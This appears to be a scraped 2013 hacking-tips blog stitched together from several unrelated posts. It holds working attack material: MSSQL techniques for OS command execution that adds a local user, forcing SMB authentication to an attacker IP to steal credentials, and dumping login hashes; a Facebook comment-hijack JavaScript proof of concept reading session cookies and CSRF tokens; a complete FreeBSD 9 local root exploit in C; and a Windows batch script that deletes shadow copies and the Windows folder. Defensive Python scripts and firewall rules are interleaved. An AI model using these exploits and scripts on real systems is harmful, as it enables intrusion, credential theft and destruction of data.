Jun 22, 2013

Hacking Tricks - Microsoft SQL Server Edition

*** How to execute OS commands when xp_cmdshell was removed AND the necessary DLLs were deleted ***
You will find tons of references on how to re-enable the xp_cmdshell stored procedure if it was disabled. Recent versions of Microsoft SQL Server ship with the xp_cmdshell stored procedure disabled by default, and all you need to do to re-enable it is execute the following commands with an administrative account:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
But what if xp_cmdshell was removed?
You will need to re-create it using sp_addextendedproc and the associated DLL. For Microsoft SQL Server 2000 you will need to execute one of the following queries:
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' 
OR
EXEC sp_addextendedproc xp_cmdshell, 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
However, if the associated DLL file was deleted too, you need to find another way. This trick may save you hours of research :)
There are different ways, but I like to use the SQL Server Agent job feature. I suggest installing sqsh (Linux), or another robust MSSQL client, to execute the following query:
DECLARE @jobID uniqueidentifier, @cmd varchar(1000)
SET @cmd = 'net user SpiderLabs TW-SPL5562 /ADD'
EXEC msdb.dbo.sp_add_job @job_name = '_tmp_MakeDirectory', @enabled  = 1, @start_step_id = 1, @owner_login_name='sa', @job_id = @jobID OUTPUT
EXEC msdb.dbo.sp_add_jobstep @job_id = @jobID, @step_name = 'Create Backup Folder', @step_id = 1, @subsystem = 'CMDEXEC', @command = @cmd
EXEC msdb.dbo.sp_add_jobserver @job_id = @jobID
EXEC msdb.dbo.sp_start_job @job_id = @jobID, @output_flag = 0
WAITFOR DELAY '000:00:05'
IF EXISTS (SELECT name FROM msdb.dbo.sysjobs WHERE name = '_tmp_MakeDirectory')
BEGIN
     EXEC msdb.dbo.sp_delete_job @job_name = '_tmp_MakeDirectory'
END
go
OK, this code is not as simple as calling xp_cmdshell, but it does the same thing (executes OS commands). Just replace the line "SET @cmd = 'net user SpiderLabs TW-SPL5562 /ADD'" with the command you want to execute. Once executed, the example code creates a local user called SpiderLabs with the password TW-SPL5562.
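
The defender's side of this trick, added here as an example that is not part of the original post or of SpiderLabs' material. Two caveats a practitioner wants first: a CMDEXEC job step runs under the SQL Server Agent service account (or a proxy account), so the Agent service must be running and the command gets that account's privileges, not necessarily the engine's; and neither route is silent, because sp_configure writes a "Configuration option '...' changed from 0 to 1" line to the SQL Server ERRORLOG, and the job exists in msdb.dbo.sysjobs while it runs. The script below scans constructed ERRORLOG lines (the line format is modelled on real ERRORLOG output, the sample entries themselves are made up) for sensitive options being switched on; the watch-list and the function names are my own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# sp_configure options whose switch to 1 commonly precedes OS-level command
# execution from inside SQL Server. The option names are real; the watch-list is ours.
WATCHED_OPTIONS = {
    "show advanced options",
    "xp_cmdshell",
    "ole automation procedures",
    "ad hoc distributed queries",
    "clr enabled",
}

# ERRORLOG line written when sp_configure changes a value, e.g.
# 2013-06-22 10:15:31.52 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. ...
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+"
    r"(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


@dataclass(frozen=True)
class Finding:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int


def scan_errorlog(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per watched option that went from 0 to a non-zero value."""
    findings = []
    for line in lines:
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option = m.group("option").lower()
        old, new = int(m.group("old")), int(m.group("new"))
        if option in WATCHED_OPTIONS and old == 0 and new != 0:
            findings.append(Finding(m.group("ts"), m.group("spid"), option, old, new))
    return findings


def options_enabled_per_session(findings: List[Finding]) -> Dict[str, List[str]]:
    """Group enabled options by spid: one session turning on 'show advanced options'
    and then 'xp_cmdshell' is exactly the sequence from the post above."""
    by_spid: Dict[str, List[str]] = {}
    for f in findings:
        by_spid.setdefault(f.spid, []).append(f.option)
    return by_spid


# Constructed sample ERRORLOG excerpt (not a real log): lines 2 and 3 are the trace the
# re-enable commands leave behind; the remaining lines are benign noise and a disable.
SAMPLE_ERRORLOG = """\
2013-06-22 10:14:02.11 Server      Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64)
2013-06-22 10:15:31.45 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2013-06-22 10:15:31.52 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2013-06-22 10:20:07.03 spid61      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2013-06-22 10:25:44.90 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    found = scan_errorlog(SAMPLE_ERRORLOG.splitlines())
    for f in found:
        print(f"{f.timestamp} {f.spid}: '{f.option}' {f.old} -> {f.new}")
    print(options_enabled_per_session(found))
```

Point the scanner at the live ERRORLOG (read it with `xp_readerrorlog` or from disk on the host) and alert on any session that enables more than one watched option in quick succession; the Agent-job variant leaves no ERRORLOG line, so pair this with a periodic query of msdb.dbo.sysjobsteps for CmdExec steps owned by unexpected logins.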

*** How to escalate privileges on MSSQL via stored procedure + UNC ***
Basically, we will set up a rogue SMB authentication server to steal credentials and force the Microsoft SQL Server database to connect to it and leak its credentials. You may want to use an SMB relay attack instead; it's up to you.
1) Start the Responder tool (https://github.com/SpiderLabs/Responder) from my friend Laurent Gaffie, or whatever you want.
2) Execute the following stored procedure:
EXEC Master.dbo.xp_DirTree "\\YourIP\x",1,1;
You just need to replace "YourIP" with the IP address of the system (attacker machine) running Responder.
At this point an SMB connection from Microsoft SQL Server has been sent to your IP address (attacker-controlled machine).
You may try downgrade attacks to use HALFLM rainbow tables, or an SMB relay attack, to obtain access to another system with this credential.
There are tons of other stored procedures that leak the Microsoft SQL Server credential via SMB, but that's your homework. :)

*** How to dump local MS-SQL Server hashes from a Windows system if you don't have access to the database ***
First of all, you need administrative access on the Windows system.
From cmd.exe, type the following command for MSSQL 2000:
osql -E -Q "SELECT name,password from master.dbo.sysxlogins"
From cmd.exe, type the following command for MSSQL 2005:
osql -E -Q "SELECT name,password_hash FROM sys.sql_logins"
The tool "osql" is installed with Microsoft SQL Server, and the option "-E" tries to authenticate to the database with your current Windows login account.

Source: http://blog.spiderlabs.com/2013/06/wendels-small-hacking-tricks-microsoft-sql-server-edition.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: DNS Caching Command In Linux


To dump or export the DNS cache of a BIND server on Linux, issue the following command:
rndc dumpdb -cache
The path of the dump file on CentOS with chrooted BIND is:
cat /var/named/chroot/var/named/data/cache_dump.db
The path may differ depending on your Linux distribution.

Flush the DNS cache and related commands:
rndc flush
rndc restart
rndc exec
rndc status
rndc reload

/etc/init.d/nscd restart
/etc/init.d/named restart
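
Once the dump exists, the question is usually "what is in it?" The following is an added example, not from the source article: a small parser for the master-file style that BIND uses in its cache dump (comment lines start with ";", directives with "$", records are "name TTL class type rdata"), with helpers to find which cached names point at a given address or carry very short TTLs. The dump fragment, the function names and the addresses are constructed for the example; the parser skips negative-cache entries (the "\-AAAA ;-$NXRRSET" form) rather than interpreting them.

```python
import re
from typing import Dict, List, Tuple

# Constructed cache-dump fragment (not a real dump) in the master-file style
# BIND writes for `rndc dumpdb -cache`.
SAMPLE_DUMP = r"""
;
; Cache dump of view '_default' (cache _default)
;
$DATE 20130622101530
; authanswer
example.com.            86236   IN NS   a.iana-servers.net.
example.com.            86236   IN NS   b.iana-servers.net.
; answer
www.example.com.        3012    IN A    93.184.216.34
www.example.com.        3012    \-AAAA  ;-$NXRRSET
; additional
a.iana-servers.net.     1730    IN A    199.43.135.53
; glue
internal.corp.example.  20      IN A    10.0.0.5
internal.corp.example.  20      IN A    10.0.0.6
"""

# One positive record: owner name, remaining TTL, class, type, rdata.
RECORD = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+(?P<cls>IN|CH|HS)\s+(?P<type>[A-Z0-9]+)\s+(?P<rdata>.+)$"
)


def parse_cache_dump(text: str) -> List[Dict[str, object]]:
    """Return positive records as dicts; comments, directives and negative entries are skipped."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";$":
            continue
        m = RECORD.match(line)
        if not m:          # e.g. the NXRRSET negative-cache line
            continue
        records.append({
            "name": m["name"].lower(),
            "ttl": int(m["ttl"]),
            "type": m["type"],
            "rdata": m["rdata"].strip(),
        })
    return records


def records_for(records: List[Dict[str, object]], name: str) -> List[Tuple[str, str]]:
    """All (type, rdata) pairs cached for one owner name (case-insensitive)."""
    name = name.lower()
    return [(r["type"], r["rdata"]) for r in records if r["name"] == name]


def names_resolving_to(records: List[Dict[str, object]], ip: str) -> List[str]:
    """Which cached names point at an address: the check to run after a poisoning scare."""
    return sorted({r["name"] for r in records
                   if r["type"] in ("A", "AAAA") and r["rdata"] == ip})


def short_ttl_names(records: List[Dict[str, object]], max_ttl: int) -> Dict[str, int]:
    """Names whose remaining TTL is at most max_ttl seconds (rapidly churning records)."""
    out: Dict[str, int] = {}
    for r in records:
        if r["ttl"] <= max_ttl:
            out[r["name"]] = min(out.get(r["name"], r["ttl"]), r["ttl"])
    return out


if __name__ == "__main__":
    recs = parse_cache_dump(SAMPLE_DUMP)
    print(len(recs), "positive records")
    print("www.example.com. ->", records_for(recs, "www.example.com."))
    print("10.0.0.5 <-", names_resolving_to(recs, "10.0.0.5"))
    print("TTL <= 60:", short_ttl_names(recs, 60))
```

Read the real file with `open("/var/named/chroot/var/named/data/cache_dump.db").read()` in place of SAMPLE_DUMP; the TTL column is the time remaining at dump time, so run `rndc dumpdb -cache` right before parsing.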




Source:  http://www.learnacad.com/component/content/article/35-centos/287-how-to-dump-the-bind-dns-cache-in-linux.html


Jun 21, 2013

Facebook Comment's Picture Hijacking

-----Javascript Facebook Picture Hijack PoC----
 
var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack
 
function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/"+statuslinkID);
 
# C21C8F0A214D3F86   1337day.com [2013-06-21]   69C7CC3775144A2C #
 



Jun 20, 2013

FreeBSD 9.{0,1} mmap/ptrace exploit [Privilege Escalation]

/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger <fbsd9lul () hunger hu>
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8 () 1470n ;)
*
* Special thanks to proactivesec.com
*

$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root () farrell cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul () hunger hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#

*/

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"

int
main(int ac, char **av) {
    int from_fd, to_fd, status;
    struct stat st;
    struct ptrace_io_desc piod;
    char *s, *d;
    pid_t pid;

    if (geteuid() == 0) {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
    }

    printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
    printf("by Hunger <fbsd9lul () hunger hu>\n");

    if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
        err(1, "open");

    if (stat(av[0], &st) == -1)
        err(2, "stat");

    if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
        (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
        err(3, "mmap");

    if ((pid = fork()) == -1)
        err(4, "fork");

    if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
            err(5, "ptraceme");

        return 0;
    }

    if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(6, "ptattach");

    if (wait(&status) == -1)
        err(7, "wait");

    piod.piod_op = PIOD_WRITE_D;
    piod.piod_offs = d;
    piod.piod_addr = s;
    piod.piod_len = st.st_size;

    if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

    execl(TG, TG, NULL);

    return 0;
}



Source:  http://cxsecurity.com/issue/WLB-2013060170


Howto: What is equivalent 'rm -rf /' on Windows?

Create a batch script (.bat) in Windows like this:
 
@echo off
echo Taking ownership....
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\*  >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul

icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul

echo Nuking system files...
vssadmin delete shadows /All /Quiet >nul 2>nul 
vssadmin delete shadows /All /Quiet >nul 2>nul 
rmdir c:\PrefLogs /s /q >nul 2>nul 
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul

echo Done
 
Source: http://astr0baby.wordpress.com/2013/06/19/windows-equivalent-of-rm-rf/ 







Jun 19, 2013

Howto: Preventing SSH from brute force attack

iptables -N bruteprotect
iptables -A bruteprotect -m recent --set --name BRUTEFORCE --rsource
iptables -A bruteprotect -m recent ! --update --seconds 60 --hitcount 4 --name BRUTEFORCE --rsource -j  RETURN
iptables -A bruteprotect -j LOG --log-prefix "[DROP BRUTEFORCE] : " --log-tcp-options --log-ip-options
iptables -A bruteprotect -j DROP


You can change the threshold (4 attempts within 60 seconds) on the 3rd line.
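
To see exactly when those four rules start dropping, here is an added example (not from the dd-wrt wiki): a small Python model of the chain, using the documented semantics of the recent match, where --set records the source address and the time, and "! --update --seconds 60 --hitcount 4" matches (and so RETURNs) only while the source has been seen fewer than 4 times in the last 60 seconds. Two things a practitioner wants to know: the chain does nothing until a rule in INPUT jumps to it for new connections to port 22 (that rule is not on the page), and because every attempt re-arms the window through --set, a host that keeps trying stays blocked until it has been quiet for a full 60 seconds. The kernel's xt_recent bookkeeping can shift the trigger by an attempt relative to this man-page model, so verify the exact count on your system. The class and function names, and the attempt sequence, are my own constructions.

```python
from collections import defaultdict, deque
from typing import List, Tuple

LIST_SIZE = 20  # xt_recent keeps at most ip_pkt_list_tot (default 20) timestamps per address


class RecentList:
    """Model of one `-m recent --name BRUTEFORCE --rsource` list, following the
    iptables-extensions man page: --set records the source address and the time;
    --update with --seconds/--hitcount matches when the address is in the list and
    has been seen at least hitcount times in the last seconds, refreshing the
    last-seen time when it matches."""

    def __init__(self) -> None:
        self.stamps = defaultdict(lambda: deque(maxlen=LIST_SIZE))

    def set(self, src: str, now: float) -> None:
        self.stamps[src].append(now)

    def update(self, src: str, now: float, seconds: int, hitcount: int) -> bool:
        if src not in self.stamps:
            return False
        hits = sum(1 for t in self.stamps[src] if now - t <= seconds)
        matched = hits >= hitcount
        if matched:
            self.stamps[src].append(now)
        return matched


def bruteprotect(recent: RecentList, src: str, now: float,
                 seconds: int = 60, hitcount: int = 4) -> str:
    """Walk the page's bruteprotect chain for one new SSH connection from src."""
    recent.set(src, now)                                 # -m recent --set
    if not recent.update(src, now, seconds, hitcount):   # -m recent ! --update ... -j RETURN
        return "RETURN"                                  # back to the calling chain, not blocked
    # -j LOG would write "[DROP BRUTEFORCE] : ..." to the kernel log; then -j DROP.
    return "DROP"


def simulate(attempts: List[Tuple[float, str]],
             seconds: int = 60, hitcount: int = 4) -> List[str]:
    """attempts are (seconds since start, source address); returns one verdict per attempt."""
    recent = RecentList()
    return [bruteprotect(recent, src, t, seconds, hitcount) for t, src in attempts]


# Constructed sequence: 203.0.113.9 hammers SSH, 198.51.100.4 logs in normally.
ATTEMPTS = [
    (0, "203.0.113.9"), (5, "203.0.113.9"), (10, "203.0.113.9"),
    (12, "198.51.100.4"),
    (15, "203.0.113.9"),   # 4th hit inside 60 s: logged and dropped
    (20, "203.0.113.9"),   # each further attempt keeps the window full, so still dropped
    (90, "198.51.100.4"),
    (130, "203.0.113.9"),  # first attempt after 60 s of silence: window empty again
]

if __name__ == "__main__":
    for (t, src), verdict in zip(ATTEMPTS, simulate(ATTEMPTS)):
        print(f"t={t:>3}s {src:<14} {verdict}")
```

Change `hitcount` and `seconds` in the call to `simulate` to preview a different threshold before editing the 3rd rule; the `[DROP BRUTEFORCE]` prefix from the 4th rule is what you grep for in the kernel log to confirm the chain is actually being hit.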
Source: http://www.dd-wrt.com/wiki/index.php/Preventing_Brute_Force_Attacks


Jun 16, 2013

Howto: Hack Your Linux System Without Using Single User Mode

As a kernel parameter we added '1' in the above process; this time we add 'init=/bin/bash' instead and boot with 'b'.

Single User Mode

Source: http://www.tecmint.com/how-to-hack-your-own-linux-system/
